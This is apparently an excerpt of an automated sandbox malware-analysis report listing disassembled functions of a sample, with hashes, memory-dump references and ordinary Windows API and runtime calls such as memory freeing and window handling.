                                                                                                                                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                                                                                    • Instruction ID: ce9ce11829f509b56a626a98953bca26d33d7fcb77d5dc979f86c997c8e69fb8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E811AB23043474BDB24FE68C891BBD7794FBA0308F00593DE98ACB286DA74C9858757
                                                                                                                                                                                                    Function 008951C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 6c3bc456d87a97827415eff3d918dca1c744b82659b0055f3d3d06aeb8e0183a
                                                                                                                                                                                                    • Instruction ID: 455bb6fefd268c4a3572cc526cee803ded2cacb46758e0d49ee55f22614ccf80
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c3bc456d87a97827415eff3d918dca1c744b82659b0055f3d3d06aeb8e0183a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A617831600F0857DE3BBBACA8957BE6394FB12754F1C0619E883DF281D651DD429716
                                                                                                                                                                                                    Function 00894F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                                                                                                                                    • Instruction ID: b94b13161581625bdeb42701ce69a0ac52740423bfa8c136f3b10e14b8ac5c3d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B512661604F4957DF367A2C896AFBF37C5FB01304F1C0959E983CB682CA15ED468396
                                                                                                                                                                                                    Function 0087EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 81ed2ab1d11a637921d7cb3c49b43c58ce873b21406a326bae134b740aba0d92
                                                                                                                                                                                                    • Instruction ID: f6ef610258abef01b520069f36aee8e5fa88057e8ec07c405d90c980bc20b1d3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81ed2ab1d11a637921d7cb3c49b43c58ce873b21406a326bae134b740aba0d92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F751D0715087958FD702CF2AC18046EBFE0FE9A314F4949A9E5DD9B243C220DA4ACB62
                                                                                                                                                                                                    Function 008800B7 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 80edbe239e54a6a5f1c1bef95b530885f41874b211e02c40a1685d385e3be83d
                                                                                                                                                                                                    • Instruction ID: 807b5785a54e3248bb428b3b2942b203a33b0bbeb3b07c73966df919981f7b8f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80edbe239e54a6a5f1c1bef95b530885f41874b211e02c40a1685d385e3be83d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A851D0B1A087159FC788CF19D48055AF7E1FF88314F058A2EE899E3740D734E959CB96
                                                                                                                                                                                                    Function 00883E0B Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                                                                                                    • Instruction ID: 37be5b0ed1f1f19583fd88246a4aa30e705d2c945b2def9f4c23fa126a435fbc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE31F8B1A147468FCB18EF28C85116EBBE0FB95704F10852DE499D7741CB35EA0ACB92
                                                                                                                                                                                                    Function 0087E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0087E30E
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                      • Part of subcall function 00881DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,008B1030,?,0087D928,00000000,?,00000050,008B1030), ref: 00881DC4
                                                                                                                                                                                                    • _strlen.LIBCMT ref: 0087E32F
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,008AE274,?), ref: 0087E38F
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0087E3C9
                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0087E3D5
                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0087E475
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0087E4A2
                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0087E4DB
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0087E4E3
                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0087E4EE
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0087E51B
                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0087E58D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                                                                    • String ID: $%s:$CAPTION$d
                                                                                                                                                                                                    • API String ID: 2407758923-2512411981
                                                                                                                                                                                                    • Opcode ID: f59130d8a1baaf380b896f8b4c5738b221c71aedd83697ea9b233939e4a45aea
                                                                                                                                                                                                    • Instruction ID: 6745989b37c2648d4b7309f3fdd6719dc24eb5cd77c3b43c6f6c0c9fd35a66e9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f59130d8a1baaf380b896f8b4c5738b221c71aedd83697ea9b233939e4a45aea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A819171208301AFD710DFA8CD89A6FBBE9FF89704F04491DFA88D7254D631E9058B52
                                                                                                                                                                                                    Function 0089CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0089CB66
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C71E
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C730
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C742
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C754
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C766
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C778
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C78A
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C79C
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C7AE
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C7C0
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C7D2
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C7E4
                                                                                                                                                                                                      • Part of subcall function 0089C701: _free.LIBCMT ref: 0089C7F6
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089CB5B
                                                                                                                                                                                                      • Part of subcall function 00898DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?), ref: 00898DE2
                                                                                                                                                                                                      • Part of subcall function 00898DCC: GetLastError.KERNEL32(?,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?,?), ref: 00898DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089CB7D
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089CB92
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089CB9D
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089CBBF
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089CBD2
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089CBE0
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089CBEB
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089CC23
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089CC2A
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089CC47
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089CC5F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                    • Opcode ID: c44d9158d7a52c3ef7fe0a9d744f76ff222c2ad03274e105acfdf35e9956d217
                                                                                                                                                                                                    • Instruction ID: dcf90462cf2802fb4b73ba0cdf9beed6833425dff18c98788036b2184b79a3be
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c44d9158d7a52c3ef7fe0a9d744f76ff222c2ad03274e105acfdf35e9956d217
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B313731600206DFEF20BA7DD846B5AB7E9FF11364F184829E189D7192DE32AC80CB21
                                                                                                                                                                                                    Function 00889711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00889736
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 008897D6
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 008897E5
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00889806
                                                                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0088982D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                                                    • API String ID: 1777411235-4209811716
                                                                                                                                                                                                    • Opcode ID: fa1956462b855973d4817a59c5c8cd368e9a3ff4b5264554b98cd474e027f56a
                                                                                                                                                                                                    • Instruction ID: d24fa118b854309aed6f9e2d5cb0707ee8ac067f218bdeb67d92d406e9ccb5fb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa1956462b855973d4817a59c5c8cd368e9a3ff4b5264554b98cd474e027f56a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 413117325183027BEB25BF689C46F6F7B98FF92320F18011EF551D61D2FB649A0583A6
                                                                                                                                                                                                    Function 0088D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0088D6C1
                                                                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0088D6ED
                                                                                                                                                                                                      • Part of subcall function 00881FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0087C116,00000000,.exe,?,?,00000800,?,?,?,00888E3C), ref: 00881FD1
                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0088D709
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0088D720
                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0088D734
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0088D75D
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0088D764
                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0088D76D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                                                                    • String ID: STATIC
                                                                                                                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                                                                                                                    • Opcode ID: 70a2f46b1fce369ad4f36964cb36d78094bbcbeb004837d633fe7798556af1e1
                                                                                                                                                                                                    • Instruction ID: 9295fbca7d22265be0acaf9a9dfe7c72ed0fc55e208d2d39fbb2999dc3a62097
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70a2f46b1fce369ad4f36964cb36d78094bbcbeb004837d633fe7798556af1e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA11E1726417117BE621BBB4AC4AFAF775CFB54711F008222FA51E20D2EA64CE0547A7
                                                                                                                                                                                                    Function 008996F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899705
                                                                                                                                                                                                      • Part of subcall function 00898DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?), ref: 00898DE2
                                                                                                                                                                                                      • Part of subcall function 00898DCC: GetLastError.KERNEL32(?,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?,?), ref: 00898DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899711
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089971C
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899727
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899732
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089973D
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899748
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899753
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089975E
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089976C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                    • Opcode ID: 173cd230564891e3b81081870db73cafface3cb29eeaaf920af5dd9ec55ea83b
                                                                                                                                                                                                    • Instruction ID: d73c752d7d2cfd02939d10ee977dcb9b9be5917d55d881b519cd8180cabba139
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 173cd230564891e3b81081870db73cafface3cb29eeaaf920af5dd9ec55ea83b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C511927611010AEFCF01FF98CC42CD93BB5FF15390B5955A5FA088B262DE32DA509B85
                                                                                                                                                                                                    Function 00892E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                    • API String ID: 322700389-393685449
                                                                                                                                                                                                    • Opcode ID: 2368bd18ec839c4555c2eabd836cd37243e0671de94dca2cd1ccd7ec0565f8d0
                                                                                                                                                                                                    • Instruction ID: a64f6239710574eb7b02041bd53fa8c4a27d03d0c37bca4057211ba1895f5e05
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2368bd18ec839c4555c2eabd836cd37243e0671de94dca2cd1ccd7ec0565f8d0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12B12871900219EFCF25FFA8C8819AEBBB5FF14310F18455AF815AB222D735DA51CB92
                                                                                                                                                                                                    Function 00876FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00876FAA
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00877013
